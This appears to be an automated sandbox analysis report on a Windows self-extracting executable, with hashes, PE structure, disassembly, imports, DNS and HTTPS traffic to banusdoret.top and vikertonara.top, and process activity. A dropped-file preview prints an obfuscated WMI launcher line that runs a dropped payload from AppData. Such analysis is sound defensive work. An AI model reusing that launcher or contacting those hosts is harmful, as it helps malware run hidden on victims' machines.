                                                  SHA-512:49B8C9F0DEB2ACC329FB7FD364F47E3D33F70BE995B7F5977FB8632D7197E0EFDA85F92813F87E9470F0DF972E473170A54490A5F988584939F1CB8C3D01CFC3
                                                  Malicious:false
                                                  Preview: GetObject("win" + "mgmts:\\\\.\\ro" + "ot\\ci" + "mv2:W" + "in32_Pr" + "oce" + "ss").Create("C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML\\juROhmfLml.exe.com C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML\\I" , "C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML", null, null )
                                                  \Device\ConDrv
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):386
                                                  Entropy (8bit):5.152841278494102
                                                  Encrypted:false
                                                  SSDEEP:12:xYV1JWrVVlNL4986lO86limAgVa2+fX6lmM86ln:xYDMlZv6lO86lim3Va2+X6lmd6ln
                                                  MD5:ED81F3E8939C9C235EE1A69A43B4FD52
                                                  SHA1:3348810A5493D6DB80F8B9B836F301C51CE0CA24
                                                  SHA-256:B6BDE1A044508592FAEEC125209BAAA4D9DB992F0DE6C0FB49D938D801A389B4
                                                  SHA-512:8B3709ED3720E79C04407669C69D05744EED79C366FB8918D448B80AF88EBA5F4B1AB325ADA0CA5E865544748028F12F173999787B1E9912E1E10A7719BA109A
                                                  Malicious:false
                                                  Preview: Cabinet Maker - Lossless Data Compression Tool.... 0.00% - raw=0 compressed=0..100.00% - raw=5,857 compressed=1,811.. 0.00% [flushing current folder]. 94.32% [flushing current folder].** 4624a8e10d6df3306e1dd46223b6b1968208dd49 placed in cabinet C:\Users\user\AppData\Local\Temp\chr2302.tmp(3211362) on disk .. 3.04% [flushing current folder].100.00% [flushing current folder].

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                  Entropy (8bit):7.948950858150679
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:WDnE51mua6.exe
                                                  File size:1338284
                                                  MD5:7e7012645cc3d6d3572bb01891fbcec1
                                                  SHA1:712fe21354098f3764f6e9cbe7b57dc67a65c478
                                                  SHA256:df116f3585f1fe4b00c351a2941f6b85565e1fcc6da5569c6f7c80ddd1b4e2a8
                                                  SHA512:8197fa8afd6ebfa016bb6ed1f81402f3520289343b98da1131cef927fe5ce8828ac6c8d95e34a6f198421285872ec556ad08ad2d2109e6244efa1d08e5cc51ca
                                                  SSDEEP:24576:453uhFDHfQS65sxmN8CaEDtRcQv6sQVoRdJXUZCiF0YqlX7xpMyNIeFKtc8GCcm:45+hFDHOoGDvcC7UnF079pjOeYt3cm
                                                  File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W.....................4......_.............@.......................... ......:................................................p.....................

                                                  File Icon

                                                  Icon Hash:1d6dec6c6cf870fc

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x41c35f
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                  DLL Characteristics:
                                                  Time Stamp:0x5700444A [Sat Apr 2 22:14:34 2016 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:a1a66d588dcf1394354ebf6ec400c223

                                                  Entrypoint Preview

                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  push FFFFFFFFh
                                                  push 0041FA80h
                                                  push 0041C4F0h
                                                  mov eax, dword ptr fs:[00000000h]
                                                  push eax
                                                  mov dword ptr fs:[00000000h], esp
                                                  sub esp, 68h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [ebp-18h], esp
                                                  xor ebx, ebx
                                                  mov dword ptr [ebp-04h], ebx
                                                  push 00000002h
                                                  call dword ptr [0041D1ECh]
                                                  pop ecx
                                                  or dword ptr [00426C88h], FFFFFFFFh
                                                  or dword ptr [00426C8Ch], FFFFFFFFh
                                                  call dword ptr [0041D1F0h]
                                                  mov ecx, dword ptr [00424C74h]
                                                  mov dword ptr [eax], ecx
                                                  call dword ptr [0041D1F4h]
                                                  mov ecx, dword ptr [00424C70h]
                                                  mov dword ptr [eax], ecx
                                                  mov eax, dword ptr [0041D1F8h]
                                                  mov eax, dword ptr [eax]
                                                  mov dword ptr [00426C84h], eax
                                                  call 00007F345CA1B822h
                                                  cmp dword ptr [004226F0h], ebx
                                                  jne 00007F345CA1B70Eh
                                                  push 0041C4E8h
                                                  call dword ptr [0041D1FCh]
                                                  pop ecx
                                                  call 00007F345CA1B7F4h
                                                  push 00422080h
                                                  push 0042207Ch
                                                  call 00007F345CA1B7DFh
                                                  mov eax, dword ptr [00424C6Ch]
                                                  mov dword ptr [ebp-6Ch], eax
                                                  lea eax, dword ptr [ebp-6Ch]
                                                  push eax
                                                  push dword ptr [00424C68h]
                                                  lea eax, dword ptr [ebp-64h]
                                                  push eax
                                                  lea eax, dword ptr [ebp-70h]
                                                  push eax
                                                  lea eax, dword ptr [ebp-60h]
                                                  push eax
                                                  call dword ptr [0041D204h]
                                                  push 00422078h
                                                  push 00422000h
                                                  call 00007F345CA1B7ACh

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1feac0xc8.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa3c5.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1d0000x390.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x1bd4a0x1be00False0.602858744395data6.71052533174IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rdata0x1d0000x41a80x4200False0.46123342803data5.74601891947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x220000x4c900x800False0.41357421875data3.69619341546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x270000xa3c50xa400False0.442644817073data6.27811106965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x271600x36baPNG image data, 228 x 228, 8-bit/color RGBA, non-interlaced
                                                  RT_ICON0x2a81c0x6529data
                                                  RT_GROUP_ICON0x30d480x22data
                                                  RT_VERSION0x30d6c0x350data
                                                  RT_MANIFEST0x310bc0x309ASCII text

                                                  Imports

                                                  DLLImport
                                                  COMCTL32.dll
                                                  SHELL32.dllShellExecuteExW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHGetSpecialFolderPathW
                                                  GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                  ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                  USER32.dllGetParent, ScreenToClient, CreateWindowExW, GetDesktopWindow, GetWindowTextLengthW, SetWindowPos, SetTimer, GetMessageW, CopyImage, KillTimer, CharUpperW, SendMessageW, ShowWindow, BringWindowToTop, wsprintfW, MessageBoxW, EndDialog, ReleaseDC, GetWindowDC, GetMenu, GetWindowLongW, GetClassNameA, wsprintfA, DispatchMessageW, SetWindowTextW, GetSysColor, DestroyWindow, MessageBoxA, GetKeyState, IsWindow, GetDlgItem, GetClientRect, GetSystemMetrics, SetWindowLongW, UnhookWindowsHookEx, SetFocus, SystemParametersInfoW, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetWindowTextW, GetWindowRect
                                                  ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                  OLEAUT32.dllSysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                                  KERNEL32.dllSetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, LoadLibraryA, SetThreadLocale, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, GetTempPathW, GetCurrentDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetModuleHandleW, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetStdHandle, WriteFile, lstrlenA, CreateDirectoryW, GetFileAttributesW, SetCurrentDirectoryW, GetLocalTime, SystemTimeToFileTime, CreateThread, GetExitCodeThread, Sleep, SetFileAttributesW, GetDiskFreeSpaceExW, SetLastError, GetTickCount, lstrlenW, ExitProcess, lstrcatW, GetProcAddress, CloseHandle, WaitForSingleObject, GetExitCodeProcess, GetQueuedCompletionStatus, ResumeThread, SetInformationJobObject, CreateIoCompletionPort, AssignProcessToJobObject, CreateJobObjectW, GetLastError, CreateProcessW, GetStartupInfoW, GetCommandLineW, GetStartupInfoA
                                                  MSVCRT.dll_purecall, ??2@YAPAXI@Z, _wtol, memset, memmove, memcpy, _wcsnicmp, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, realloc, free, wcsstr, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, strncmp, wcsncmp, wcsncpy, strncpy, ??3@YAXPAX@Z

                                                  Version Infos

                                                  DescriptionData
                                                  LegalCopyrightCopyright 2005-2016 Oleg N. Scherbakov
                                                  InternalName7ZSfxMod
                                                  FileVersion1.7.0.3900
                                                  CompanyNameOleg N. Scherbakov
                                                  PrivateBuildApril 1, 2016
                                                  ProductName7-Zip SFX
                                                  ProductVersion1.7.0.3900
                                                  FileDescription7z Setup SFX (x86)
                                                  OriginalFilename7ZSfxMod_x86.exe
                                                  Translation0x0000 0x04b0

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 10:51:48.211783886 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.248919964 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.249011040 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.297076941 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.334189892 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.335027933 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.335057974 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.335076094 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.335144997 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.335174084 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.401423931 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.439044952 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:48.439230919 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.458048105 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:48.537000895 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:51.044800043 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:51.044917107 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:51.101850033 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:51.138989925 CEST443497308.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:51.139132977 CEST49730443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.261534929 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.298271894 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.298368931 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.299004078 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.335913897 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.336038113 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.336169958 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.336937904 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.340210915 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.340400934 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.377252102 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.377367020 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.447762012 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.448004961 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.484589100 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.487601995 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.521543980 CEST443497368.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.521784067 CEST49736443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.524744034 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.524957895 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.525288105 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.562771082 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.562814951 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.563021898 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.563952923 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.566720009 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.603965044 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.670713902 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.670866966 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.723289013 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.760421038 CEST443497378.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.760620117 CEST49737443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.834237099 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.871321917 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.871542931 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.871781111 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.908390045 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.908427954 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:51:59.908519983 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.909439087 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.914376974 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:51:59.951232910 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.016449928 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.017641068 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.074441910 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.111310005 CEST443497388.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.111473083 CEST49738443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.191163063 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.228209019 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.229124069 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.229389906 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.266302109 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.266318083 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.266870975 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.267250061 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.270010948 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.306919098 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.373229980 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.373536110 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.398222923 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.435311079 CEST443497398.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.436233044 CEST49739443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.503431082 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.540998936 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.544018984 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.544552088 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.582031012 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.582063913 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.582192898 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.582699060 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.585120916 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.622780085 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.686142921 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.689125061 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.738214970 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.776184082 CEST443497408.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.776597977 CEST49740443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.847709894 CEST49741443192.168.2.68.208.95.18
                                                  Apr 8, 2021 10:52:00.885088921 CEST443497418.208.95.18192.168.2.6
                                                  Apr 8, 2021 10:52:00.885189056 CEST49741443192.168.2.68.208.95.18

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 10:50:12.925071001 CEST6426753192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:12.937567949 CEST53642678.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:14.182961941 CEST4944853192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:14.195956945 CEST53494488.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:15.112163067 CEST6034253192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:15.124771118 CEST53603428.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:20.564079046 CEST6134653192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:20.576509953 CEST53613468.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:30.808983088 CEST5177453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:30.821641922 CEST53517748.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:31.685741901 CEST5602353192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:31.698636055 CEST53560238.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:39.998100042 CEST5838453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:40.011301994 CEST53583848.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:42.811518908 CEST6026153192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:42.823417902 CEST53602618.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:44.874286890 CEST5606153192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:44.887089968 CEST53560618.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:46.472759962 CEST5833653192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:46.486099958 CEST53583368.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:47.450792074 CEST5378153192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:47.463474035 CEST53537818.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:48.312582970 CEST5406453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:48.326539040 CEST53540648.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:48.603174925 CEST5281153192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:48.617897987 CEST53528118.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:51.302234888 CEST5529953192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:51.314358950 CEST53552998.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:52.029544115 CEST6374553192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:52.042207956 CEST53637458.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:50:52.439315081 CEST5005553192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:50:52.453015089 CEST53500558.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:03.801086903 CEST6137453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:03.813566923 CEST53613748.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:29.412709951 CEST5033953192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:29.425477028 CEST53503398.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:30.261276007 CEST6330753192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:30.273669004 CEST53633078.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:30.883323908 CEST4969453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:30.901643038 CEST53496948.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:39.885373116 CEST5498253192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:39.900033951 CEST53549828.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:45.649997950 CEST5001053192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:45.667886972 CEST53500108.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:48.161295891 CEST6371853192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:48.174905062 CEST53637188.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:52.257822037 CEST6211653192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:52.269671917 CEST53621168.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:53.155883074 CEST6381653192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:53.169202089 CEST53638168.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:51:54.576421976 CEST5501453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:51:54.623588085 CEST53550148.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:52:16.008687019 CEST6220853192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:52:16.021300077 CEST53622088.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:52:26.028850079 CEST5757453192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:52:26.061989069 CEST53575748.8.8.8192.168.2.6
                                                  Apr 8, 2021 10:52:27.082496881 CEST5181853192.168.2.68.8.8.8
                                                  Apr 8, 2021 10:52:27.103729010 CEST53518188.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 8, 2021 10:50:39.998100042 CEST192.168.2.68.8.8.80x880cStandard query (0)zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyRA (IP address)IN (0x0001)
                                                  Apr 8, 2021 10:50:52.439315081 CEST192.168.2.68.8.8.80xf091Standard query (0)zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyRA (IP address)IN (0x0001)
                                                  Apr 8, 2021 10:51:48.161295891 CEST192.168.2.68.8.8.80x1688Standard query (0)banusdoret.topA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 8, 2021 10:50:40.011301994 CEST8.8.8.8192.168.2.60x880cName error (3)zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyRnonenoneA (IP address)IN (0x0001)
                                                  Apr 8, 2021 10:50:52.453015089 CEST8.8.8.8192.168.2.60xf091Name error (3)zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyRnonenoneA (IP address)IN (0x0001)
                                                  Apr 8, 2021 10:51:48.174905062 CEST8.8.8.8192.168.2.60x1688No error (0)banusdoret.top8.208.95.18A (IP address)IN (0x0001)

                                                  HTTPS Packets

                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                  Apr 8, 2021 10:51:48.335057974 CEST8.208.95.18443192.168.2.649730CN=vikertonara.top CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 26 18:10:55 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 27 19:10:55 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:10:50:21
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\Desktop\WDnE51mua6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\WDnE51mua6.exe'
                                                  Imagebase:0x400000
                                                  File size:1338284 bytes
                                                  MD5 hash:7E7012645CC3D6D3572BB01891FBCEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:10:50:23
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\svchost.exe'
                                                  Imagebase:0xf60000
                                                  File size:44520 bytes
                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
